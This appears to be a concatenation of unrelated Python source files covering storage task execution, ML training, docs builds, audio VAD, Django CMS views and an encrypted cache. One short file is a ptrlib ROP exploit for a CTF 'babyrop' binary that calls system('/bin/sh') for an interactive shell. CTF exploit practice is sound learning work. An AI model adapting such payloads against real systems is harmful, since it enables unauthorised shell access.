# are executed.
if parallelizable and should_use_parallelism():
exit_code = task_graph_executor.TaskGraphExecutor(
plurality_checkable_task_iterator,
max_process_count=properties.VALUES.storage.process_count.GetInt(),
thread_count=properties.VALUES.storage.thread_count.GetInt(),
task_status_queue=task_status_queue,
progress_type=progress_type).run()
else:
with task_status.progress_manager(task_status_queue, progress_type):
_execute_tasks_sequential(
plurality_checkable_task_iterator,
task_status_queue=task_status_queue)
# TODO(b/188092601) Deterimine the exit_code in _execute_tasks_sequential.
exit_code = 0
return exit_code
|
import numpy as np
from . import itrainer
from .. import network
from typing import Callable, List, Tuple
class StochasticGradientDescent(itrainer.ITrainer):
@staticmethod
def numerical_gradient(f: Callable, x: np.array, delta: float = 1e-4) -> np.array:
grad = np.zeros_like(x)
it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])
while not it.finished:
idx = it.multi_index
center_x = float(x[idx])
x[idx] = center_x + delta
f_front = f(x)
x[idx] = center_x - delta
f_rear = f(x)
x[idx] = center_x
grad[idx] = (f_front - f_rear) / (2 * delta)
it.iternext()
return grad
def __init__(self, learning_rate: float = 1e-1, batch_size: int = 100):
self.learning_rate = learning_rate
self.batch_size = batch_size
def train(self, network: network.INetwork, train_image: np.array, train_label: np.array):
for iteration in range(max(1, int(train_image.shape[0] / self.batch_size))):
print(
f'iteration: {iteration} / {int(train_image.shape[0] / self.batch_size)}')
mask = np.random.choice(train_image.shape[0], self.batch_size)
batch_image = train_image[mask]
batch_label = train_label[mask]
grad_weights, grad_biases = self.get_gradients(
network, batch_image, batch_label)
for layer, grad_weight, grad_bias in zip(network.layers, grad_weights, grad_biases):
layer.weight -= self.learning_rate * grad_weight
layer.bias -= self.learning_rate * grad_bias
print(network.get_loss(batch_image, batch_label))
def get_gradients(self, network: network.INetwork, image: np.array, label: np.array) -> Tuple[List[np.array], List[np.array]]:
def get_loss(x): return network.get_loss(image, label)
grad_weights = []
grad_biases = []
for layer in network.layers:
grad_weights.append(
StochasticGradientDescent.numerical_gradient(get_loss, layer.weight))
grad_biases.append(
StochasticGradientDescent.numerical_gradient(get_loss, layer.bias))
return grad_weights, grad_biases
|
#!/usr/bin/env python
# ........................................................................... #
#
# This script generates the documentation using Python docutils.
#
# It requires the following softwares to be installed and made available from
# the invocation path context:
#
# - Python (of course!)
# - the docutils module (see http://docutils.sourceforge.net/)
# - a LaTeX distribution to invoke 'pdflatex' (MikTeX, TeXLive, teTeX, ...)
#
# It should be noted that the pdflatex invocation can be skipped if necessary
# by using a special command-line flag.
#
# ........................................................................... #
#
# IzPack - Copyright 2001-2008 Julien Ponge, All Rights Reserved.
#
# http://izpack.org/
# http://developer.berlios.de/projects/izpack/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ........................................................................... #
import os
import shutil
from glob import glob
from optparse import OptionParser
from docutils.core import publish_cmdline as publish
def create_dirs():
print('Creating output directories...')
for d in ['html', 'pdf', 'xml']:
if not os.path.exists(d): os.makedirs(d)
def scan_files():
print('Scanning files...')
rest_files = [ f[0:(len(f) - 4)] for f in glob('*.txt') if f != 'pdf-version.txt' ]
resources = glob('*.jpg') + glob('*.png') + glob('*.css')
return rest_files, resources
def copy_files(resources):
print('Copying resources...')
for pic in resources:
print(' ' + pic)
shutil.copyfile(pic, 'html/' + pic)
shutil.copyfile(pic, 'pdf/' + pic)
shutil.copyfile('picins.sty', 'pdf/picins.sty')
def generate_html(rest_files):
print('Generating html...')
shutil.copyfile('include-top', 'include-top.inc')
shutil.copyfile('include-bottom', 'include-bottom.inc')
for rest_file in rest_files:
print(' ' + rest_file)
args = [
'--link-stylesheet',
'--stylesheet-path=html/izpack.css',
'--cloak-email-addresses',
'%s.txt' % rest_file,
'html/%s.html' % rest_file
]
publish(writer_name='html', argv=args)
def generate_xml():
print('Generating XML...')
shutil.copyfile('include-empty', 'include-top.inc')
shutil.copyfile('include-empty', 'include-bottom.inc')
for rest_file in rest_files:
print(' ' + rest_file)
args = [
#'--indents',
'--no-doctype',
'%s.txt' % rest_file,
'xml/%s.xml'% rest_file
]
publish(writer_name='xml', argv=args)
def generate_latex():
print('Generating LaTeX for PDF output...')
shutil.copyfile('include-empty', 'include-top.inc')
shutil.copyfile('include-empty', 'include-bottom.inc')
publish(writer_name='newlatex2e', argv=['pdf-version.txt', 'pdf/manual.tex'])
def compile_latex():
print('Generating PDF from LaTeX...')
os.chdir('pdf')
for i in xrange(1,4):
print(' pdflatex pass #%i' % i)
os.system('pdflatex --interaction=batchmode manual.tex')
os.chdir('..')
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-n", "--no-pdflatex", dest="pdflatex", action="store_false",
default=True, help="don't call pdflatex")
options, args = parser.parse_args()
rest_files, resources = scan_files()
create_dirs()
copy_files(resources)
generate_xml()
generate_html(rest_files)
if options.pdflatex:
generate_latex()
compile_latex()
print('Done')
|
#!/usr/bin/env python
import rospy
from race.msg import drive_param
from std_msgs.msg import Float64
import numpy as np
def talker():
topic = 'floats'
pub = rospy.Publisher(topic, numpy_msg(Floats))
rospy.init_node('talker_node', anonymous=True)
r = rospy.Rate(10) # 10hz
rospy.loginfo("I will publish to the topic %s", topic)
while not rospy.is_shutdown():
a = numpy.array([1.0, 2.1, 3.2, 4.3, 5.4, 6.5], dtype=numpy.float32)
pub.publish(a)
r.sleep()
if __name__ == '__main__':
talker()
|
import dataclasses
import json
import streamlit as st
from pydantic.json import pydantic_encoder
import streamlit_pydantic as sp
@dataclasses.dataclass
class ExampleModel:
some_number: int
some_boolean: bool
some_text: str = "default input"
data = sp.pydantic_form(key="my_form", model=ExampleModel)
if data:
st.json(json.dumps(data, default=pydantic_encoder))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*
# Copyright: [CUP] - See LICENSE for details.
# Authors: Guannan Ma (@mythmgn),
"""
:description:
unittest for cup.services.executor
"""
import os
import sys
import time
_NOW_PATH = os.path.dirname(os.path.abspath(__file__)) + '/'
sys.path.insert(0, _NOW_PATH + '../')
import cup
from cup import unittest
from cup import log
from cup.services import executor
class TestMyCase(unittest.CUTCase):
"""
test class for cup
"""
def __init__(self):
super(self.__class__, self).__init__(
'./test.log', log.DEBUG
)
log.info('Start to run ' + str(__file__))
self._executor = executor.ExecutionService(
)
def setup(self):
"""
setup
"""
self._executor.run()
self._info = time.time()
def _change_data(self, data=None):
self._info = time.time() + 100
def test_run(self):
"""
@author: maguannan
"""
self._executor.delay_exec(5, self._change_data, 1)
time.sleep(2)
assert time.time() > self._info
time.sleep(5)
assert time.time() < self._info
def teardown(self):
"""
teardown
"""
cup.log.info('End running ' + str(__file__))
self._executor.stop()
if __name__ == '__main__':
cup.unittest.CCaseExecutor().runcase(TestMyCase())
# vi:set tw=0 ts=4 sw=4 nowrap fdm=indent
|
"""
USAGE:-
For FILE mode: python extract_timestamps.py -f <WAV_FILE_PATH> -a <AGGRESSIVENESS_LEVEL>
Ex: python extract_timestamps.py -f tts_modi_exp/resampled_16000/PM_Modi/PM_Modi_addresses_the_Nation_on_issues_relating_to_COVID19_PMO.wav
-a 1
--------------------------------------------------------------------------------------------------------------------------------------------
For FOLDER mode: python extract_timestamps.py -i <FOLDER_PATH> -a <AGGRESSIVENESS_LEVEL>
Ex: python extract_timestamps.py -i tts_modi_exp/resampled_16000/PM_Modi/ -a 1
"""
import collections
import contextlib
import wave
import webrtcvad
import os
import argparse
# import sys
def read_wave(path):
"""Reads a .wav file.
Takes the path, and returns (PCM audio data, sample rate).
"""
with contextlib.closing(wave.open(path, 'rb')) as wf:
num_channels = wf.getnchannels()
assert num_channels == 1
sample_width = wf.getsampwidth()
assert sample_width == 2
sample_rate = wf.getframerate()
assert sample_rate in (8000, 16000, 32000, 48000)
pcm_data = wf.readframes(wf.getnframes())
return pcm_data, sample_rate
class Frame(object):
"""Represents a "frame" of audio data."""
def __init__(self, bytes, timestamp, duration):
self.bytes = bytes
self.timestamp = timestamp
self.duration = duration
def frame_generator(frame_duration_ms, audio, sample_rate):
"""Generates audio frames from PCM audio data.
Takes the desired frame duration in milliseconds, the PCM data, and
the sample rate.
Yields Frames of the requested duration.
"""
n = int(sample_rate * (frame_duration_ms / 1000.0) * 2)
offset = 0
timestamp = 0.0
duration = (float(n) / sample_rate) / 2.0
while offset + n < len(audio):
yield Frame(audio[offset:offset + n], timestamp, duration)
timestamp += duration
offset += n
def vad_collector(sample_rate, frame_duration_ms,
padding_duration_ms, vad, frames, start_time, end_time):
"""Filters out non-voiced audio frames.
Given a webrtcvad.Vad and a source of audio frames, yields only
the voiced audio.
Uses a padded, sliding window algorithm over the audio frames.
When more than 90% of the frames in the window are voiced (as
reported by the VAD), the collector triggers and begins yielding
audio frames. Then the collector waits until 90% of the frames in
the window are unvoiced to detrigger.
The window is padded at the front and back to provide a small
amount of silence or the beginnings/endings of speech around the
voiced frames.
Arguments:
sample_rate - The audio sample rate, in Hz.
frame_duration_ms - The frame duration in milliseconds.
padding_duration_ms - The amount to pad the window, in milliseconds.
vad - An instance of webrtcvad.Vad.
frames - a source of audio frames (sequence or generator).
Returns: A generator that yields PCM audio data.
"""
num_padding_frames = int(padding_duration_ms / frame_duration_ms)
# We use a deque for our sliding window/ring buffer.
ring_buffer = collections.deque(maxlen=num_padding_frames)
# We have two states: TRIGGERED and NOTTRIGGERED. We start in the
# NOTTRIGGERED state.
triggered = False
voiced_frames = []
for frame in frames:
is_speech = vad.is_speech(frame.bytes, sample_rate)
#sys.stdout.write('1' if is_speech else '0')
if not triggered:
ring_buffer.append((frame, is_speech))
num_voiced = len([f for f, speech in ring_buffer if speech])
# If we're NOTTRIGGERED and more than 90% of the frames in
# the ring buffer are voiced frames, then enter the
# TRIGGERED state.
if num_voiced > 0.9 * ring_buffer.maxlen:
triggered = True
start_time.append(ring_buffer[0][0].timestamp)
#sys.stdout.write('+(%s)' % (ring_buffer[0][0].timestamp,))
# We want to yield all the audio we see from now until
# we are NOTTRIGGERED, but we have to start with the
# audio that's already in the ring buffer.
for f, s in ring_buffer:
voiced_frames.append(f)
ring_buffer.clear()
else:
# We're in the TRIGGERED state, so collect the audio data
# and add it to the ring buffer.
voiced_frames.append(frame)
ring_buffer.append((frame, is_speech))
num_unvoiced = len([f for f, speech in ring_buffer if not speech])
# If more than 90% of the frames in the ring buffer are
# unvoiced, then enter NOTTRIGGERED and yield whatever
# audio we've collected.
if num_unvoiced > 0.9 * ring_buffer.maxlen:
#sys.stdout.write('-(%s)' % (frame.timestamp + frame.duration))
end_time.append(frame.timestamp + frame.duration)
triggered = False
yield b''.join([f.bytes for f in voiced_frames])
ring_buffer.clear()
voiced_frames = []
if triggered:
end_time.append(frame.timestamp + frame.duration)
#sys.stdout.write('-(%s)' % (frame.timestamp + frame.duration))
#sys.stdout.write('\n')
# If we have any leftover voiced audio when we run out of input,
# yield it.
if voiced_frames:
yield b''.join([f.bytes for f in voiced_frames])
def extract_time_stamps(wav_file, aggr_level):
start_time = []
end_time = []
audio, sample_rate = read_wave(wav_file)
vad = webrtcvad.Vad(int(aggr_level))
frames = frame_generator(30, audio, sample_rate)
frames = list(frames)
segments = vad_collector(sample_rate, 30, 300, vad, frames, start_time, end_time)
chunks = 0
for i, segment in enumerate(segments):
chunks = chunks + 1
if chunks != len(start_time):
print("Error: Segments not broken properly")
exit
return start_time, end_time
def extract_time_stamp_for_all_wav_files_in_a_folder(path, aggr_level):
wav_files_list = os.listdir(path)
print(len(wav_files_list))
for x in range(0,len(wav_files_list)):
wav_file = path + wav_files_list[x]
start_time, end_time = extract_time_stamps(wav_file, aggr_level)
# print("Start Timestamps: ", start_time, "\n\n End Timestamps: ", end_time)
print('Wav File Name: ', wav_file)
print("Aggresiveness Level: ", aggr_level)
if len(start_time) == len (end_time):
print("Chunk count will be: ",len(start_time))
else:
print("len(start_time) != len (end_time)")
wav_file_name = wav_file.split("/")[-1]
timestamps_file = wav_file_name.replace('.wav', '.csv')
file = 'tts_modi_exp/' + timestamps_file
with open(file, 'w') as f:
f.write("Start_time,End_time\n")
for i in range(0, len(start_time)):
f.write("{},{}\n".format(start_time[i], end_time[i]))
def extract_time_stamp_for_a_wav_file(wav_file, aggr_level):
start_time, end_time = extract_time_stamps(wav_file, aggr_level)
# print("Start Timestamps: ", start_time, "\n\n End Timestamps: ", end_time)
print('Wav File Name: ', wav_file)
print("Aggresiveness Level: ", aggr_level)
if len(start_time) == len (end_time):
print("Chunk count will be: ",len(start_time))
else:
print("len(start_time) != len (end_time)")
wav_file_name = wav_file.split("/")[-1]
timestamps_file = wav_file_name.replace('.wav', '.csv')
file = 'tts_modi_exp/' + timestamps_file
with open(file, 'w') as f:
f.write("Start_time,End_time\n")
for i in range(0, len(start_time)):
f.write("{},{}\n".format(start_time[i], end_time[i]))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--input-folder', '-i', type=str)
parser.add_argument('--input-file', '-f', type=str)
parser.add_argument('--aggresiveness_level', '-a', type=int, default=3)
args = parser.parse_args()
extract_time_stamp_for_a_wav_file(args.input_file, args.aggresiveness_level)
# extract_time_stamp_for_all_wav_files_in_a_folder(args.input_folder, args.aggresiveness_level)
print("\nTimestamp Extraction Done!") |
import os
from jumpscale import j
from .OauthInstance import OauthClient
JSConfigFactory = j.tools.configmanager.base_class_configs
class OauthFactory(JSConfigFactory):
def __init__(self):
self.__jslocation__ = "j.clients.oauth"
JSConfigFactory.__init__(self, OauthClient)
|
"""A helper module defining generated information about crate_universe dependencies"""
# This global should match the current release of `crate_unvierse`.
DEFAULT_URL_TEMPLATE = "https://github.com/bazelbuild/rules_rust/releases/download/crate_universe-13/crate_universe_resolver-{host_triple}{extension}"
# Note that if any additional platforms are added here, the pipeline defined
# by `create_universe.yaml` should also be updated
DEFAULT_SHA256_CHECKSUMS = {
"aarch64-apple-darwin": "c6017cd8a4fee0f1796a8db184e9d64445dd340b7f48a65130d7ee61b97051b4",
"aarch64-unknown-linux-gnu": "d0a310b03b8147e234e44f6a93e8478c260a7c330e5b35515336e7dd67150f35",
"x86_64-apple-darwin": "762f1c77b3cf1de8e84d7471442af1314157efd90720c7e1f2fff68556830ee2",
"x86_64-pc-windows-gnu": "c44bd97373d690587e74448b13267077d133f04e89bedfc9d521ae8ba55dddb9",
"x86_64-unknown-linux-gnu": "aebf51af6a3dd33fdac463b35b0c3f4c47ab93e052099199673289e2025e5824",
}
|
from ptrlib import *
sock = Process("./babyrop")
elf = ELF("./babyrop")
#sock = Socket("problem.harekaze.com", 20001)
rop_pop_rdi = 0x00400683
rop_ret = 0x00400479
payload = b'A' * 0x18
payload += p64(rop_ret)
payload += p64(rop_pop_rdi)
payload += p64(elf.base() + 0x200000 + next(elf.find("/bin/sh\x00")))
payload += p64(elf.plt("system"))
payload += p64(0xffffffffffffffff)
sock.sendline(payload)
sock.interactive()
|
class Solution:
def dfs(self, nums:list, cur_pos:int, pre_dict:dict):
n = len(nums)
if cur_pos == n - 1:
pre_dict[cur_pos] = True
return True
if nums[cur_pos] == 0:
pre_dict[cur_pos] = False
return False
if cur_pos + nums[cur_pos] >= n:
pre_dict[cur_pos] = True
return True
for k in range(nums[cur_pos], 0, -1):
if cur_pos + k in pre_dict and not pre_dict[cur_pos + k]:
continue
if cur_pos + k < n:
if self.dfs(nums, cur_pos + k, pre_dict):
pre_dict[cur_pos] = True
return True
pre_dict[cur_pos] = False
return False
def canJump(self, nums: list) -> bool:
n = len(nums)
if not n:
return False
if n == 1:
return True
info_dict = {}
res = self.dfs(nums, 0, info_dict)
return res
sl = Solution()
t1 = [2,3,1,1,4]
res = sl.canJump(t1)
print(res)
t2 = [3,2,1,0,4]
sl = Solution()
res = sl.canJump(t2)
print(res)
t3 = [2,0,6,9,8,4,5,0,8,9,1,2,
9,6,8,8,0,6,3,1,2,2,1,2,
6,5,3,1,2,2,6,4,2,4,3,0,
0,0,3,8,2,4,0,1,2,0,1,4,
6,5,8,0,7,9,3,4,6,6,5,8,
9,3,4,3,7,0,4,9,0,9,8,4,
3,0,7,7,1,9,1,9,4,9,0,1,
9,5,7,7,1,5,8,2,8,2,6,8,
2,2,7,5,1,7,9,6]
res = sl.canJump(t3)
print(res) |
import nltk
from flask import Flask, request
from flask_cors import cross_origin
from nltk.tokenize.treebank import TreebankWordTokenizer, TreebankWordDetokenizer
import spacy
from spacy.tokens import Doc
app = Flask(__name__)
nlp = spacy.load('en_core_web_lg')
@app.route("/tokenize", methods=["POST"])
@cross_origin()
def tokenize():
text = request.json["text"]
doc = nlp(text)
tokens = []
for i in range(len(doc)):
token = doc[i]
print(token.idx, token.idx + len(token.text), doc[i].text)
tokens.append((token.idx, token.idx + len(token.text), doc[i].text))
return {"tokens": tokens}
@app.route("/detokenize", methods=["POST"])
@cross_origin()
def detokenize():
tokens = request.json["tokens"]
doc = Doc(nlp.vocab, tokens)
return {"text": doc.text}
if __name__ == "__main__":
app.run(port=5555, debug=True)
|
from lf3py.api.errors import UnsupportedMediaTypeError
from lf3py.api.request import Request
from lf3py.openapi.schema import embed
@embed.consume('application/json')
def json(request: Request):
if request.headers.get('Content-Type') != 'application/json':
raise UnsupportedMediaTypeError()
|
from telegram import Update
from telegram.ext import CallbackContext
from gym_bot_app.decorators import get_trainee_and_group
from gym_bot_app.commands import (Command,
SelectDaysCommand)
from gym_bot_app.models import Trainee, Group
class MyDaysCommand(Command):
"""Telegram gym bot my days command.
Sends the selected training days of the requested trainee.
"""
DEFAULT_COMMAND_NAME = 'my_days'
NO_DAYS_SELECTED_MESSAGE = 'לא בחרת ימים להתאמן יא בוט. קח תתפנק'
def __init__(self, *args, **kwargs):
super(MyDaysCommand, self).__init__(*args, **kwargs)
@get_trainee_and_group
def _handler(self, update: Update, context: CallbackContext, trainee: Trainee, group: Group):
"""Override method to handle my days command.
Checks the training days of the requested trainee and sends it back to the chat.
If trainee did not select any training days, sends select days keyboard based on SelectDaysCommand keyboard.
"""
self.logger.info('My days command with %s in %s', trainee, group)
training_days = ', '.join(day.name for day in trainee.training_days.filter(selected=True))
if training_days: # trainee has selected training days.
self.logger.debug('Trainee days %s', training_days)
update.message.reply_text(quote=True, text=training_days)
else: # trainee did not select any training days.
self.logger.debug('Trainee does not have any training days')
select_days_keyboard = SelectDaysCommand.get_select_days_keyboard(trainee=trainee)
update.message.reply_text(quote=True,
text=self.NO_DAYS_SELECTED_MESSAGE,
reply_markup=select_days_keyboard)
|
from pathlib import Path
def get_file_size(path_to_file):
return Path(path_to_file).stat().st_size
def get_allowed_sizes():
allowed = dict()
mb = 1
byte = 1048576
for i in range(12):
allowed.update({str(mb): byte})
mb += mb
byte += byte
return allowed
def get_needed_parts(path_to_file, part_size_bytes, total_size):
last_part_size = total_size % part_size_bytes
amount_of_parts = (total_size - last_part_size) / part_size_bytes
parts = list()
for _ in range(int(amount_of_parts)):
parts.append({"part_size": part_size_bytes})
if last_part_size > 0:
parts.append({"part_size": last_part_size})
return parts
def add_byte_ranges(parts):
start = 0
for part in parts:
end = start + part.get("part_size")
part.update(
{
"range": f"bytes {start}-{end-1}/*",
"range_start": start,
"range_end": end - 1,
}
)
start = end
return parts
|
#!/usr/bin/env python
import logging
import coloredlogs
import os
import sys
class Log(object):
def __init__(self,logger=None,level='DEBUG'):
if os.getenv("LOG_LEVEL"):
level = os.getenv("LOG_LEVEL")
level,logging_level = parse(level)
self.logger = logging.getLogger(logger)
LOG_FORMAT = "%(asctime)s %(levelname)s %(filename)s[line:%(lineno)d] - %(message)s"
if os.getenv("LOG_WITH_COLOR") and os.getenv("LOG_WITH_COLOR") == "false":
logging.basicConfig(level=logging_level, format=LOG_FORMAT)
else:
coloredlogs.install(
level=level,
logger=self.logger,
datefmt='%Y-%m-%d/%H:%M:%S',
fmt=LOG_FORMAT
)
def get_logger(self):
return self.logger
def parse(level):
level = level.upper()
logging_level = None
if level == "DEBUG":
logging_level = logging.DEBUG
elif level == "INFO":
logging_level = logging.INFO
elif level == "WARNING":
logging_level = logging.WARNING
elif level == "ERROR":
logging_level = logging.ERROR
elif level == "CRITICAL":
logging_level = logging.CRITICAL
else:
print("Error: unknown log level,supported: {'INFO','WARNING','ERROR','CRITICAL'}")
sys.exit(1)
return level,logging_level
|
""" View handler definitions for Nine CMS """
__author__ = 'George Karakostas'
__copyright__ = 'Copyright 2015, George Karakostas'
__licence__ = 'BSD-3'
__email__ = 'gkarak@9-dev.com'
from django.shortcuts import render, redirect, get_object_or_404
from django.views.generic import View
from django.template import loader
from django.http import Http404
from django.core.mail import mail_managers, BadHeaderError
from django.core.exceptions import PermissionDenied
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.models import Group
from django.utils.translation import ugettext as _
from ninecms.utils.render import NodeView
from ninecms.utils.perms import get_perms, set_perms
from ninecms.utils import status
from ninecms.models import Node, PageType, MenuItem
from ninecms.forms import ContactForm, LoginForm, RedirectForm, ContentTypePermissionsForm
class ContentNodeView(NodeView):
""" Display a node as invoked by its node id from /cms/content/<node_id>
If an alias exists then issue redirect to allow a single content page per URL
"""
def get(self, request, **kwargs):
""" HTML get for /cms/content/<node_id>
:param request: the request object
:param kwargs: contains node_id
:return: response object
"""
node = get_object_or_404(Node, id=kwargs['node_id'])
if node.alias:
return redirect('ninecms:alias', url_alias=(node.alias + '/'), permanent=True)
if not node.status and not request.user.has_perm('ninecms.view_unpublished'):
raise PermissionDenied
return self.render(node, request)
class AliasView(NodeView):
""" Render content based on Url Alias """
def get(self, request, **kwargs):
""" HTML get for /<url_alias>
:param request: the request object
:param kwargs: contains url_alias
:return: response object
"""
if kwargs['url_alias'][-1] == '/':
alias = kwargs['url_alias'][:-1]
if alias == '/':
return redirect('ninecms:index', permanent=True) # pragma: no cover
try:
node = self.get_node_by_alias(alias, request)
except IndexError:
raise Http404
if not node.status and not request.user.has_perm('ninecms.view_unpublished'):
raise PermissionDenied
if node.redirect:
return redirect(node.get_redirect_path(), permanent=True)
return self.render(node, request)
else:
return redirect('ninecms:alias', url_alias=(kwargs['url_alias'] + '/'), permanent=True)
class IndexView(NodeView):
""" Render index at root / """
def get(self, request):
""" HTML get for /
:param request: the request object
:return: response object
"""
try:
node = self.get_node_by_alias('/', request)
except IndexError:
messages.warning(request, "No front page has been created yet.")
return redirect('admin:index')
return self.render(node, request)
class ContactView(View):
""" Handle contact post request """
form_class = ContactForm
def post(self, request):
""" Handle contact form send
:param request: the request object
:return: response object
"""
form = self.form_class(request.POST)
if form.is_valid():
t = loader.get_template('ninecms/mail_contact.txt')
c = {
'sender_name': form.cleaned_data['sender_name'],
'sender_email': form.cleaned_data['sender_email'],
'message': form.cleaned_data['message'],
}
try:
mail_managers(form.cleaned_data['subject'], t.render(c))
except BadHeaderError: # pragma: no cover
messages.error(request, _("Contact form message has NOT been sent. Invalid header found."))
else:
messages.success(request, _("A message has been sent to the site using the contact form."))
return redirect(form.cleaned_data['redirect'])
messages.warning(request, _("Contact form message has NOT been sent. Please fill in all contact form fields."))
request.session['contact_form_post'] = request.POST
return redirect(form.cleaned_data['redirect'])
class LoginView(View):
""" Handle login post request """
form_class = LoginForm
def post(self, request):
""" Handle login form send
:param request: the request object
:return: response object
"""
form = self.form_class(request.POST)
if form.is_valid():
user = authenticate(username=form.cleaned_data['username'], password=form.cleaned_data['password'])
if user is not None:
if user.is_active:
login(request, user)
messages.success(request, _("Login successful for %s.") % user.username)
else:
msg = _("The account is disabled. Please use the contact form for more information.")
messages.warning(request, msg)
else:
msg = _("Unfortunately the username or password are not correct. "
"If you have forgotten your password use the link below the form to recover it.")
messages.warning(request, msg)
else:
messages.warning(request, _("Please fill in all login form fields."))
request.session['login_form_post'] = request.POST
return redirect(form.cleaned_data['redirect'])
class LogoutView(View):
""" Handle logout post request """
form_class = RedirectForm
def post(self, request):
""" Handle logout form send
:param request: the request object
:return: response object
"""
form = self.form_class(request.POST)
if form.is_valid():
logout(request)
messages.success(request, _("Logout successful."))
return redirect(form.cleaned_data['redirect'])
class ContentTypePermsView(View):
""" Content edit form at /cms/types/<id>/edit """
permissions_form_class = ContentTypePermissionsForm
def get(self, request, **kwargs):
""" HTML get for /cms/types/<node_id>/edit
:param request: the request object
:param kwargs: contains node_id
:return: response object
"""
page_type = get_object_or_404(PageType, id=kwargs['type_id'])
perms = get_perms(page_type, list(self.permissions_form_class().fields.keys()), '_pagetype')
permissions_form = self.permissions_form_class(initial=perms)
groups = Group.objects.all().count()
return render(request, 'admin/ninecms/pagetype/perms_form.html', {
'permissions_form': permissions_form,
'groups': groups,
'page_type': page_type,
'clone': kwargs.get('clone', False),
})
def post(self, request, **kwargs):
""" HTML post for /cms/types/<id>/edit
:param request: the request object
:param kwargs: contains node_id
:return: response object
"""
page_type = get_object_or_404(PageType, id=kwargs['type_id'])
permissions_form = self.permissions_form_class(request.POST)
groups = Group.objects.all().count()
if permissions_form.is_valid():
if request.user.has_perm(('guardian.add_groupobjectpermission',
'guardian.change_groupobjectpermission',
'guardian.delete_groupobjectpermission')):
set_perms(page_type, list(permissions_form.fields.keys()), '_pagetype', permissions_form.cleaned_data)
messages.success(request, _("Content type '%s' has been updated.") % page_type.name)
return redirect('admin:ninecms_pagetype_changelist')
else: # pragma: nocover
messages.warning(request, _("Content type has not been updated. Please check the form for errors."))
return render(request, 'admin/ninecms/pagetype/perms_form.html', {
'permissions_form': permissions_form,
'groups': groups,
'page_type': page_type,
})
class StatusView(View):
""" Status page at cms/status """
# noinspection PyUnusedLocal
def get(self, request):
""" HTML get for status page
:return: response object
"""
return redirect('admin:index', permanent=True)
# noinspection PyMethodMayBeStatic
def post(self, request):
""" HTML post for status page
If menu-rebuild has been posted, rebuild menu and redirect
If clear-cache has been posted, clear cache and redirect
:param request: the request object
:return: response object (redirect to get)
"""
if 'menu-rebuild' in request.POST:
# noinspection PyUnresolvedReferences
MenuItem.objects.rebuild()
messages.success(request, _("Menu has been rebuilt."))
if 'clear-cache' in request.POST:
status.cache_clear()
messages.success(request, _("Cache has been cleared."))
return redirect('admin:index')
|
from src.block import DataBlock
class MessageModeA(object):
def __init__(self, metablock, valid_blocks, message_id):
self.__metadata_block = metablock
self.__valid_blocks = valid_blocks
self.__header_len = 5
self.__data_string = ""
self.__output = ""
self.__message_id = message_id
self.__encode()
def __encode(self):
data_block = DataBlock()
message_start = self.__metadata_block.message_start_blocks[self.__message_id]
message_end = self.__metadata_block.message_start_blocks[self.__message_id + 1]
if message_end == 0:
message_end = len(self.__valid_blocks)
for block_index in range(message_start, message_end):
if block_index in self.__valid_blocks and block_index % 16 is not 0:
self.__data_string += data_block.decode("".join([str(i) for i in self.__valid_blocks[block_index]]))
elif block_index not in self.__valid_blocks:
raise IndexError
self.__encode_5er()
def __encode_5er(self):
_5er = [self.__data_string[i:i + 5] for i in range(0, len(self.__data_string), 5)]
header = _5er[0:5]
data_5er = _5er[5:]
for j in range(5):
self.__output += header[j]
if j == 4:
self.__output += "\n"
else:
self.__output += " "
for i in range(1, len(data_5er)):
self.__output += data_5er[i - 1]
if i % 10 == 0 and i != 0:
self.__output += "\n"
else:
self.__output += " "
@property
def id(self):
return self.__message_id
@property
def content(self):
return self.__output
class MessageModeB(object):
def __init__(self, metablock, valid_blocks):
self.__metablock = metablock
self.__valid_blocks = valid_blocks
|
import os
import threading
from time import time
from filebytecontent import FileByteContent
from mixslice import MixSlice
LOCK = threading.Lock()
class CacheEntry:
def __init__(self, path, content, mtime=None):
self.path = path
self.content = content
self.opens = 1 # number of concurrent apps with this file open
self.modified = True if not mtime else False
self.atimes = int(time())
self.mtimes = self.atimes if not mtime else mtime
class Cache:
def __init__(self):
self.files = {}
def __contains__(self, path):
return path in self.files
# ------------------------------------------------------ Helpers
def _decrypt(self, path, key, iv):
return MixSlice.decrypt(path, key, iv)
def _encrypt(self, path, key, iv):
plaintext = self.files[path].content.read_all()
MixSlice.encrypt(plaintext, path, key, iv)
# ------------------------------------------------------ Methods
def open(self, path, key, iv, mtime):
with LOCK:
if path in self.files:
self.files[path].opens += 1
return
plaintext = FileByteContent(self._decrypt(path, key, iv))
self.files[path] = CacheEntry(path, plaintext, mtime)
def create(self, path, key, iv):
with LOCK:
if path in self.files:
self.files[path].opens += 1
return
plaintext = FileByteContent(b'')
self.files[path] = CacheEntry(path, plaintext)
self.flush(path, key, iv)
def read_bytes(self, path, offset, length):
with LOCK:
if path not in self.files:
return None
content = self.files[path].content
return content.read_bytes(offset, length)
def write_bytes(self, path, buf, offset):
with LOCK:
if path not in self.files:
return 0
content = self.files[path].content
bytes_written = content.write_bytes(buf, offset)
self.files[path].modified = True
self.files[path].mtimes = int(time())
return bytes_written
def truncate_bytes(self, path, length):
with LOCK:
if path not in self.files:
return
content = self.files[path].content
content.truncate(length)
self.files[path].modified = True
self.files[path].mtimes = int(time())
def flush(self, path, key, iv):
with LOCK:
if path not in self.files:
return
file_already_exists = os.path.exists(path)
if file_already_exists:
os.utime(path, (self.files[path].atimes, self.files[path].mtimes))
with LOCK:
if not self.files[path].modified:
return
self.files[path].modified = False
self._encrypt(path, key, iv)
if not file_already_exists:
os.utime(path, (self.files[path].atimes, self.files[path].mtimes))
def release(self, path):
with LOCK:
if path not in self.files:
return
self.files[path].opens -= 1
if not self.files[path].opens:
del self.files[path]
def get_size(self, path):
with LOCK:
if path not in self.files:
return 0
return len(self.files[path].content)
def rename(self, old, new):
with LOCK:
if old not in self.files:
return
self.files[new] = self.files[old]
del self.files[old]
|
#!/usr/bin/env pypy
from os import system as sh
